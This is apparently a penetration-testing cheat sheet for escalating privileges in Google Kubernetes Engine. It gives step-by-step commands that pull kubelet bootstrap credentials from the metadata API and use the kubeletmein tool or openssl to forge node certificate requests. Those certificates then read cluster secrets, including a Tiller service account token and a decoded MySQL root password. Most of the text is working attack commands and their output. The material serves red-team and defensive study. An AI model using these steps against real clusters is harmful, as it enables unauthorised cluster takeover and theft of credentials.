Skip to content

GCP

Goal

GKE Metadata API Attribute kube-env
  1. Obtain kube-env script from Metadata API, extract kubelet credentials, become "kubelet"
  2. Get pod list and enumerate privileged secrets
  3. Become highest privilege SA
GCE/GKE Metadata API Compute R/W
  1. Obtain IAM Token from Metadata API
  2. Enumerate Instances Info
  3. POST to Compute API to update instance ssh-key
  4. SSH Into Node, sudo

Automated

GKE Metadata

  • Download kubeletmein:

    $ wget https://github.com/4ARMED/kubeletmein/releases/download/v0.5.3/kubeletmein_0.5.3_linux_amd64 -O ./kubeletmein && chmod +x ./kubeletmein
    

  • Create a bootstrap-kubeconfig file which contains the kubelet key/cert from kube-env:

    $ kubeletmein gke bootstrap
    

  • Generate a new cert (at this point, we don't know our nodes names within the cluster so just use anything for the node name):

    $ kubeletmein gke generate -n anything
    

  • We now have a kubeconfig file in the current directory which has system:nodes access from the certificate in the ./pki directory

    $ kubectl --kubeconfig kubeconfig get pods
    

Steal Secrets

  • Find the location of the Tiller RBAC service account token secret (we will use Tiller as a target):

    $ kubectl --kubeconfig kubeconfig get pods -l app=helm,name=tiller -n kube-system -o wide
    NAME                             READY   STATUS    RESTARTS   AGE   IP          NODE
    tiller-deploy-5c99b8bcbf-w7xq5   1/1     Running   0          18m   10.36.1.8   gke-cluster0-default-pool-eb80ec96-9n9f
    

  • Since Tiller is deployed to node gke-cluster0-default-pool-eb80ec96-9n9f we need a node cert for that

  • First, delete the existing certs generated by kubeletmein in the ./pki directory (by default):

    $ rm pki/kubelet-client-*
    

  • Then, generate the new one:

    $ kubeletmein gke generate -n gke-cluster0-default-pool-eb80ec96-9n9f
    

  • Use the newly created kubeconfig to read secrets:

    $ kubectl --kubeconfig kubeconfig -n kube-system get pod tiller-deploy-5c99b8bcbf-w7xq5 -o jsonpath='{.spec.volumes[0].secret.secretName}{"\n"}'
    tiller-token-mr4df
    

  • Obtain the token and decode it into a file:

    $ kubectl --kubeconfig kubeconfig -n kube-system get secret tiller-token-mr4df -o jsonpath='{.data.token}' | base64 -d > tiller-token
    

  • Use the token to access the API as the tiller service account

    $ kubectl --certificate-authority ca-certificates.crt --token ${cat tiller-token} --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secrets
    

Kube-Env-Stealer

  • bgeesaman/kube-env-stealer
  • If you can run a pod in GKE and the cluster isn't running Metadata Concealment or the newer implementation of Workload Identity, you have a really good chance at becoming cluster-admin in under a minute

Manual

GKE Metadata

  • GKE supplies an instance attribute called kube-env, 3 values are interesting:

    • KUBELET_CERT
    • KUBELET_KEY
    • CA_CERT
  • Try to access this metadata from a compromised pod:

    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_CERT | awk '{print $2}' | base64 -d > kubelet.crt
    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^KUBELET_KEY | awk '{print $2}' | base64 -d > kubelet.key
    $ curl -s -H 'Metadata-Flavor: Google' 'http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env' | grep ^CA_CERT | awk '{print $2}' | base64 -d > apiserver.crt
    

  • Try to access the Kubernetes API as the kubelet ($KUBERNETES_PORT_443_TCP_ADDR is a standard environment variable exposed to all pods giving the IP address of the master):

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods --all-namespaces
    Error from server (Forbidden): pods is forbidden: User "kubelet" cannot list pods at the cluster scope
    

  • These credentials are just bootstrapping credentials that allow access to the CertificateSigningRequest object. The kubelet uses these bootstrap credentials to submit a certificate signing request (CSR) to the control plane

  • Use those credentials again but this time, instead of looking for pods, look at the csrs. You'll see some for your cluster nodes:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests
    NAME                                                   AGE    REQUESTOR   CONDITION
    node-csr-0eoGCDTP-Q-UYT7KYh-zBB1_3emr4SG43m1XDomxNUI   157m   kubelet     Approved,Issued
    node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM   28m    kubelet     Approved,Issued
    

  • The kube-controller-manager will, by default, auto-approve certificate signing requests with a common name prefixed with "system:nodes:" and issue a client certificate that the kubelet can then use for its normal functions

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o yaml
    

  • The certificate is in the status.certificate field:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get certificatesigningrequests node-csr-B4IEIxlmoF35wRbjtcRe3WOtu2aVNb_cXH-5S2kZiJM -o jsonpath='{.status.certificate}' | base64 -d > node.crt
    

  • Use the certificate and supply it via --client-certificate:

    $ kubectl --client-certificate node.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods
    error: tls: private key type does not match public key type
    

  • It doesn't work because the kubelet bootstrap creates a new private key (with the function LoadOrGenerateKeyFile) before it creates the CSR. We can retrieve the certificate but we don’t have the key so we can't use it.

  • Let's create our own key, generate a CSR and submit it to the API
  • If you have a look at that certificate we downloaded, you will see the Subject we need.

    $ openssl x509 -in node.crt -text
    ...
    Subject: O=system:nodes, CN=system:node:gke-cluster19-default-pool-6c73beb1-wmh3
    

  • For now we will use arbitraryname:

    $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:arbitraryname"
    

  • Now submit this to the API:

    $ cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: node-csr-$(date +%s)
    spec:
      groups:
      - system:nodes
      request: $(cat k8shack.csr | base64 | tr -d '\n')
      usages:
      - digital signature
      - key encipherment
      - client auth
    EOF
    

  • Did it get approved?

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-15435198
    00
    NAME                  AGE    REQUESTOR   CONDITION
    node-csr-1543519800   111s   kubelet     Approved,Issued
    

  • Let's go grab our certificate like we did before:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-15435198
    00 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
    

  • Now let's use it to access the apiserver:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pods -o wide
    

  • We now have access to the API as the group system:nodes

Steal secrets

  • You cannot list all secrets, so find the secret from the pod spec:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get pod gangly-rattlesnake-mysql-master-0 -o yaml
    apiVersion: v1
    kind: Pod
    [..]
    spec:
      containers:
      - env:
        - name: MYSQL_ROOT_PASSWORD
          valueFrom:
            secretKeyRef:
              key: mysql-root-password
              name: gangly-rattlesnake-mysql
        - name: MYSQL_DATABASE
    

  • Let's grab it:

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
    Error from server (Forbidden): secrets "gangly-rattlesnake-mysql" is forbidden: User "system:node:arbitraryname" cannot get secrets in the namespace "default": no path found to object
    

  • The cluster is running Node Authorization which means RBAC will only let a node see the secrets of pods running on itself. As we've tried to access this secret with a made-up node name of arbitraryname we are not authorised as it’s not on a node of that name

  • The solution is simple. Find the node name we need and request a new certificate with the correct node name. Kubernetes does not restrict which nodes can request which certificates
  • Create a new CSR:

    $ openssl req -nodes -newkey rsa:2048 -keyout k8shack.key -out k8shack.csr -subj "/O=system:nodes/CN=system:node:gke-cluster19-default-pool-6c73beb1-8cj1"
    

  • Then submit it to the API server as before:

    cat <<EOF | kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} create -f -
    apiVersion: certificates.k8s.io/v1beta1
    kind: CertificateSigningRequest
    metadata:
      name: node-csr-$(date +%s)
    spec:
      groups:
      - system:nodes
      request: $(cat k8shack.csr | base64 | tr -d '\n')
      usages:
      - digital signature
      - key encipherment
      - client auth
    EOF
    

  • Then retrieve the cert:

    $ kubectl --client-certificate kubelet.crt --client-key kubelet.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get csr node-csr-1543524743 -o jsonpath='{.status.certificate}' | base64 -d > node2.crt
    

  • Now let's do this

    $ kubectl --client-certificate node2.crt --client-key k8shack.key --certificate-authority apiserver.crt --server https://${KUBERNETES_PORT_443_TCP_ADDR} get secret gangly-rattlesnake-mysql -o yaml
    apiVersion: v1
    data:
      mysql-replication-password: T1lVRVI3TDE1Zg==
      mysql-root-password: OXNSWkRZUnZhRQ==
    kind: Secret
    metadata:
      creationTimestamp: 2018-11-29T20:22:57Z
      labels:
        app: mysql
        chart: mysql-4.2.0
        heritage: Tiller
        release: gangly-rattlesnake
      name: gangly-rattlesnake-mysql
      namespace: default
      resourceVersion: "24460"
      selfLink: /api/v1/namespaces/default/secrets/gangly-rattlesnake-mysql
      uid: 8f19d5fd-f414-11e8-a0f7-42010a80009b
    type: Opaque
    

  • The secret is base64 encoded:

    $ echo -n OXNSWkRZUnZhRQ== | base64 -d
    9sRZDYRvaE